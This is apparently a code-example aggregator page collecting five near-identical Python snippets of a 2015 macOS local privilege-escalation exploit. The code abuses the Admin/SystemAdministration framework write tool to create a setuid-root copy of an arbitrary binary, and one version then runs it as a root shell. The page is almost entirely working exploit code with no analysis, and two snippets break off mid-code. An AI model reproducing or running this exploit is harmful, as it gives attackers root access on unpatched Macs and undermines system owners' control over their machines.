コード例 #1
0
ファイル: poc_2015_0079.py プロジェクト: dg201/poc-buf
    def verify(cls, args):
        source_binary = args['options']['target']
        dest_binary = os.path.realpath(args['options']['dest_binary'])

        if not os.path.exists(source_binary):
            raise Exception("file does not exist!")

        pool = NSAutoreleasePool.alloc().init()

        attr = NSMutableDictionary.alloc().init()
        attr.setValue_forKey_(04777, NSFilePosixPermissions)
        data = NSData.alloc().initWithContentsOfFile_(source_binary)

        print "[*] will write file", dest_binary

        if cls.use_old_api():
            adm_lib = cls.load_lib("/Admin.framework/Admin")
            Authenticator = objc.lookUpClass("Authenticator")
            ToolLiaison = objc.lookUpClass("ToolLiaison")
            SFAuthorization = objc.lookUpClass("SFAuthorization")

            authent = Authenticator.sharedAuthenticator()
            authref = SFAuthorization.authorization()

            # authref with value nil is not accepted on OS X <= 10.8
            authent.authenticateUsingAuthorizationSync_(authref)
            st = ToolLiaison.sharedToolLiaison()
            tool = st.tool()
            tool.createFileWithContents_path_attributes_(
                data, dest_binary, attr)
        else:
            adm_lib = cls.load_lib(
                "/SystemAdministration.framework/SystemAdministration")
            WriteConfigClient = objc.lookUpClass("WriteConfigClient")
            client = WriteConfigClient.sharedClient()
            client.authenticateUsingAuthorizationSync_(None)
            tool = client.remoteProxy()

            tool.createFileWithContents_path_attributes_(
                data, dest_binary, attr, 0)

        print "[+] Done!"
        del pool
        args['success'] = True
        args['poc_ret']['dest_binary'] = dest_binary
        return args
コード例 #2
0
ファイル: poc_2015_0079.py プロジェクト: 0x24bin/poc-1
    def verify(cls, args):
        source_binary = args['options']['target']
        dest_binary = os.path.realpath(args['options']['dest_binary'])

        if not os.path.exists(source_binary):
            raise Exception("file does not exist!")

        pool = NSAutoreleasePool.alloc().init()

        attr = NSMutableDictionary.alloc().init()
        attr.setValue_forKey_(04777, NSFilePosixPermissions)
        data = NSData.alloc().initWithContentsOfFile_(source_binary)

        print "[*] will write file", dest_binary

        if cls.use_old_api():
            adm_lib = cls.load_lib("/Admin.framework/Admin")
            Authenticator = objc.lookUpClass("Authenticator")
            ToolLiaison = objc.lookUpClass("ToolLiaison")
            SFAuthorization = objc.lookUpClass("SFAuthorization")

            authent = Authenticator.sharedAuthenticator()
            authref = SFAuthorization.authorization()

            # authref with value nil is not accepted on OS X <= 10.8
            authent.authenticateUsingAuthorizationSync_(authref)
            st = ToolLiaison.sharedToolLiaison()
            tool = st.tool()
            tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
        else:
            adm_lib = cls.load_lib("/SystemAdministration.framework/SystemAdministration")
            WriteConfigClient = objc.lookUpClass("WriteConfigClient")
            client = WriteConfigClient.sharedClient()
            client.authenticateUsingAuthorizationSync_(None)
            tool = client.remoteProxy()

            tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)

        print "[+] Done!"
        del pool
        args['success'] = True
        args['poc_ret']['dest_binary'] = dest_binary
        return args
コード例 #3
0
if len(args) != 3:
    print "usage: exploit.py source_binary dest_binary_as_root"
    sys.exit(-1)

source_binary = args[1]
dest_binary = os.path.realpath(args[2])

if not os.path.exists(source_binary):
    raise Exception("file does not exist!")

pool = NSAutoreleasePool.alloc().init()

attr = NSMutableDictionary.alloc().init()
attr.setValue_forKey_(04777, NSFilePosixPermissions)
data = NSData.alloc().initWithContentsOfFile_(source_binary)

print "will write file", dest_binary

if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
    Authenticator = objc.lookUpClass("Authenticator")
    ToolLiaison = objc.lookUpClass("ToolLiaison")
    SFAuthorization = objc.lookUpClass("SFAuthorization")

    authent = Authenticator.sharedAuthenticator()
    authref = SFAuthorization.authorization()

    # authref with value nil is not accepted on OS X <= 10.8
    authent.authenticateUsingAuthorizationSync_(authref)
    st = ToolLiaison.sharedToolLiaison()
コード例 #4
0
    def run(self):
        try:

            source_binary = self.options.get("src_file")[1]
            dest_binary = self.options.get("des_file")[1]

            if source_binary == None \
                    or source_binary == "" \
                    or dest_binary == None \
                    or dest_binary == "":
                self.print_error(
                    "It's mandatory to specify a source file and a destination file!!"
                )
                return

            if not os.path.exists(source_binary):
                self.print_error("File does not exist!")
                return

            if os.path.exists(dest_binary):
                self.print_error(
                    "Destination file already exists. Use another name or remove/rename the original file!"
                )
                return

            pool = NSAutoreleasePool.alloc().init()

            attr = NSMutableDictionary.alloc().init()
            attr.setValue_forKey_(0o04777, NSFilePosixPermissions)
            data = NSData.alloc().initWithContentsOfFile_(source_binary)

            self.print_info("will write file " + dest_binary)

            if self.use_old_api():
                adm_lib = self.load_lib("/Admin.framework/Admin")
                Authenticator = objc.lookUpClass("Authenticator")
                ToolLiaison = objc.lookUpClass("ToolLiaison")
                SFAuthorization = objc.lookUpClass("SFAuthorization")

                authent = Authenticator.sharedAuthenticator()
                authref = SFAuthorization.authorization()

                # authref with value nil is not accepted on OS X <= 10.8
                authent.authenticateUsingAuthorizationSync_(authref)
                st = ToolLiaison.sharedToolLiaison()
                tool = st.tool()
                tool.createFileWithContents_path_attributes_(
                    data, dest_binary, attr)
            else:
                adm_lib = self.load_lib(
                    "/SystemAdministration.framework/SystemAdministration")
                WriteConfigClient = objc.lookUpClass("WriteConfigClient")
                client = WriteConfigClient.sharedClient()
                client.authenticateUsingAuthorizationSync_(None)
                tool = client.remoteProxy()

                tool.createFileWithContents_path_attributes_(
                    data, dest_binary, attr, 0)

            self.print_ok("Done!")

            del pool

            while not os.path.exists(dest_binary):
                self.print_info("Waiting file creation...")
                time.sleep(1)

            self.print_ok("Returning root whell at: " + dest_binary)
            subprocess.call(dest_binary)

        except OSError as e:
            if e.errno == os.errno.ENOENT:
                print("Sorry, iSelect binary - Not found!")
            else:
                print("Error executing exploit")
            raise
コード例 #5
0
if len(args) != 3:
    print "usage: exploit.py source_binary dest_binary_as_root"
    sys.exit(-1)

source_binary = args[1]
dest_binary = os.path.realpath(args[2])

if not os.path.exists(source_binary):
    raise Exception("file does not exist!")

pool = NSAutoreleasePool.alloc().init()

attr = NSMutableDictionary.alloc().init()
attr.setValue_forKey_(04777, NSFilePosixPermissions)
data = NSData.alloc().initWithContentsOfFile_(source_binary)

print "will write file", dest_binary

if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
    Authenticator = objc.lookUpClass("Authenticator")
    ToolLiaison = objc.lookUpClass("ToolLiaison")
    SFAuthorization = objc.lookUpClass("SFAuthorization")

    authent = Authenticator.sharedAuthenticator()
    authref = SFAuthorization.authorization()

    # authref with value nil is not accepted on OS X <= 10.8
    authent.authenticateUsingAuthorizationSync_(authref)
    st = ToolLiaison.sharedToolLiaison()